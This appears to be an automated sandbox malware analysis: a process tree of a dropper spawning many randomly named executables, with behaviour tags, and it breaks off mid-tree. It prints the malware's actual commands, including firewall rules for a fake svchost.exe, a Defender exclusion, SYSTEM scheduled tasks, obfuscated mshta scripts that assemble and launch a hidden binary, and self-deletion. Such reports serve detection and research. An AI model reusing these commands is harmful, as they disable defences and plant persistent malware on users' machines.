C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\AppData\Roaming\League.exe"C:\Users\Admin\AppData\Roaming\League.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 10527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe"C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe" /mixtwo8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 17529⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2729⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Y9cwGigB6qwOuguftOmpB8FC.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"10⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2004 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2688 /prefetch:111⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2680 /prefetch:111⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2572 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1640 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=3732 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1956 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2364 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2468 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Elt_1hjZ7Cc_SE7oikY5wVyf.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2886257.exe"C:\Users\Admin\AppData\Roaming\2886257.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6475169.exe"C:\Users\Admin\AppData\Roaming\6475169.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3603410.exe"C:\Users\Admin\AppData\Roaming\3603410.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\104049.exe"C:\Users\Admin\AppData\Roaming\104049.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5339904.exe"C:\Users\Admin\AppData\Roaming\5339904.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8535876.exe"C:\Users\Admin\AppData\Roaming\8535876.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "6s2iqIIuSomyLF6cFihESuip.exe" -F9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"6⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"8⤵
-
                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
